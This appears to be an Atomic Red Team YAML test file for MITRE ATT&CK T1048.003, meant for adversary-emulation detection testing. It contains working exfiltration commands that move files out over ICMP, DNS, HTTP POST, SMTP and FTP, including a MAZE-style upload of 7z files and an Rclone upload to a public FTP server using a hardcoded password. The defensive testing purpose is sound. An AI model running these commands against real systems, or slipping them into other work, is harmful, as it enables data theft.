Markus
158728fab4
Co-authored-by: Markus Schader <markus.schader@worldline.com> Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
220 lines
9.2 KiB
YAML
220 lines
9.2 KiB
YAML
attack_technique: T1048.003
|
|
display_name: "Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol"
|
|
atomic_tests:
|
|
- name: Exfiltration Over Alternative Protocol - HTTP
|
|
auto_generated_guid: 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff
|
|
description: |
|
|
A firewall rule (ipfw,pf,iptables or firewalld) will be needed to allow exfiltration on port 1337.
|
|
|
|
Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded.
|
|
supported_platforms:
|
|
- macos
|
|
- linux
|
|
executor:
|
|
steps: |
|
|
1. Victim System Configuration:
|
|
|
|
mkdir /tmp/victim-staging-area
|
|
echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt
|
|
|
|
2. Using Python to establish a one-line HTTP server on victim system:
|
|
|
|
cd /tmp/victim-staging-area
|
|
python -m SimpleHTTPServer 1337
|
|
|
|
3. To retrieve the data from an adversary system:
|
|
|
|
wget http://VICTIM_IP:1337/victim-file.txt
|
|
name: manual
|
|
- name: Exfiltration Over Alternative Protocol - ICMP
|
|
auto_generated_guid: dd4b4421-2e25-4593-90ae-7021947ad12e
|
|
description: |
|
|
Exfiltration of specified file over ICMP protocol.
|
|
|
|
Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout.
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
input_file:
|
|
description: Path to file to be exfiltrated.
|
|
type: path
|
|
default: C:\Windows\System32\notepad.exe
|
|
ip_address:
|
|
description: Destination IP address where the data should be sent.
|
|
type: string
|
|
default: 127.0.0.1
|
|
executor:
|
|
command: |
|
|
$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
|
|
name: powershell
|
|
- name: Exfiltration Over Alternative Protocol - DNS
|
|
auto_generated_guid: c403b5a4-b5fc-49f2-b181-d1c80d27db45
|
|
description: |
|
|
Exfiltration of specified file over DNS protocol.
|
|
supported_platforms:
|
|
- linux
|
|
executor:
|
|
steps: |
|
|
1. On the adversary machine run the below command.
|
|
|
|
tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches \\".domain\\"" >> received_data.txt
|
|
|
|
2. On the victim machine run the below commands.
|
|
|
|
xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done
|
|
|
|
3. Once the data is received, use the below command to recover the data.
|
|
|
|
cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r
|
|
name: manual
|
|
- name: Exfiltration Over Alternative Protocol - HTTP
|
|
auto_generated_guid: 6aa58451-1121-4490-a8e9-1dada3f1c68c
|
|
description: |
|
|
Exfiltration of specified file over HTTP.
|
|
Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
$content = Get-Content #{input_file}
|
|
Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content
|
|
name: powershell
|
|
input_arguments:
|
|
input_file:
|
|
description: Path to file to exfiltrate
|
|
type: path
|
|
default: C:\Windows\System32\notepad.exe
|
|
ip_address:
|
|
description: Destination IP address where the data should be sent
|
|
type: string
|
|
default: http://127.0.0.1
|
|
- name: Exfiltration Over Alternative Protocol - SMTP
|
|
auto_generated_guid: ec3a835e-adca-4c7c-88d2-853b69c11bb9
|
|
description: |
|
|
Exfiltration of specified file over SMTP.
|
|
Upon successful execution, powershell will send an email with attached file to exfiltrate to a remote address. Results will be via stdout.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
Send-MailMessage -From #{sender} -To #{receiver} -Subject "T1048.003 Atomic Test" -Attachments #{input_file} -SmtpServer #{smtp_server}
|
|
name: powershell
|
|
input_arguments:
|
|
input_file:
|
|
description: Path to file to exfiltrate
|
|
type: path
|
|
default: C:\Windows\System32\notepad.exe
|
|
sender:
|
|
description: The email address of the sender
|
|
type: string
|
|
default: "test@corp.com"
|
|
receiver:
|
|
description: The email address of the receiver
|
|
type: string
|
|
default: "test@corp.com"
|
|
smtp_server:
|
|
description: SMTP server to use for email transportation
|
|
type: string
|
|
default: "127.0.0.1"
|
|
- name: MAZE FTP Upload
|
|
auto_generated_guid: 57799bc2-ad1e-4130-a793-fb0c385130ba
|
|
description: |
|
|
This test simulates MAZE's ransomware's ability to exfiltrate data via FTP.
|
|
Upon successful execution, all 7z files within the %windir%\temp directory will be uploaded to a remote FTP server.
|
|
Reference: https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
ftp_server:
|
|
description: FTP Server address
|
|
type: string
|
|
default: 127.0.0.1
|
|
username:
|
|
description: Username for FTP server login
|
|
type: string
|
|
default:
|
|
password:
|
|
description: Password for FTP server login
|
|
type: string
|
|
default:
|
|
executor:
|
|
command: |
|
|
$Dir_to_copy = "$env:windir\temp"
|
|
$ftp = "ftp://#{ftp_server}/"
|
|
$web_client = New-Object System.Net.WebClient
|
|
$web_client.Credentials = New-Object System.Net.NetworkCredential('#{username}', '#{password}')
|
|
if (test-connection -count 1 -computername "#{ftp_server}" -quiet)
|
|
{foreach($file in (dir $Dir_to_copy "*.7z"))
|
|
{echo "Uploading $file..."
|
|
$uri = New-Object System.Uri($ftp+$file.name)
|
|
$web_client.UploadFile($uri, $file.FullName)}}
|
|
else
|
|
{echo "FTP Server Unreachable. Please verify the server address in input args and try again."}
|
|
cleanup_command: |
|
|
$ftp = "ftp://#{ftp_server}/"
|
|
try {foreach ($file in (dir "$env:windir\temp" "*.7z"))
|
|
{$uri = New-Object System.Uri($ftp+$file.name)
|
|
$ftp_del = [System.Net.FtpWebRequest]::create($uri)
|
|
$ftp_del.Credentials = New-Object System.Net.NetworkCredential('#{username}','#{password}')
|
|
$ftp_del.Method = [System.Net.WebRequestMethods+Ftp]::DeleteFile
|
|
$ftp_del.GetResponse()}} catch{}
|
|
name: powershell
|
|
- name: Exfiltration Over Alternative Protocol - FTP - Rclone
|
|
auto_generated_guid: b854eb97-bf9b-45ab-a1b5-b94e4880c56b
|
|
description: |-
|
|
Rclone may be used by an adversary to exfiltrate data to a publicly hosted FTP server.
|
|
[Reference](https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/)
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
ftp_server:
|
|
description: Your own ftp server
|
|
type: string
|
|
default: ftp.dlptest.com
|
|
ftp_pass:
|
|
description: Your FTP user's password
|
|
type: string
|
|
default: rNrKYTX9g7z3RgJRmxWuGHbeu
|
|
ftp_user:
|
|
description: Your FTP username
|
|
type: string
|
|
default: dlpuser
|
|
ftp_port:
|
|
description: Your FTP's port
|
|
type: integer
|
|
default: 21
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Check if the exfil package exists
|
|
prereq_command: |
|
|
if (Test-Path C:\Users\Public\Downloads\exfil.zip) {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
fsutil file createnew C:\Users\Public\Downloads\exfil.zip 20485760
|
|
- description: 'Check if rclone zip exists'
|
|
prereq_command: |
|
|
if (Test-Path C:\Users\Public\Downloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "C:\Users\Public\Downloads\rclone-current-windows-amd64.zip"
|
|
Expand-Archive C:\Users\Public\Downloads\rclone-current-windows-amd64.zip -DestinationPath C:\Users\Public\Downloads\
|
|
executor:
|
|
command: |-
|
|
$rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
|
|
$exfil_pack = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "exfil.zip" | Select-Object -ExpandProperty FullName
|
|
&$rclone_bin config create ftpserver "ftp" "host" #{ftp_server} "port" #{ftp_port} "user" #{ftp_user} "pass" #{ftp_pass}
|
|
&$rclone_bin copy --max-age 2y $exfil_pack ftpserver --bwlimit 2M -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P --ftp-no-check-certificate
|
|
name: powershell
|
|
elevation_required: true
|
|
- name: Python3 http.server
|
|
auto_generated_guid: 3ea1f938-f80a-4305-9aa8-431bc4867313
|
|
description: |
|
|
An adversary may use the python3 standard library module http.server to exfiltrate data. This test checks if python3 is available and if so, creates a HTTP server on port 9090, captures the PID, sleeps for 10 seconds, then kills the PID and unsets the $PID variable.
|
|
supported_platforms:
|
|
- linux
|
|
executor:
|
|
name: sh
|
|
elevation_required: false
|
|
command: |
|
|
[ "$(uname)" = 'FreeBSD' ] && alias python3=python3.9
|
|
if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sleep 10; kill $PID; unset PID; fi
|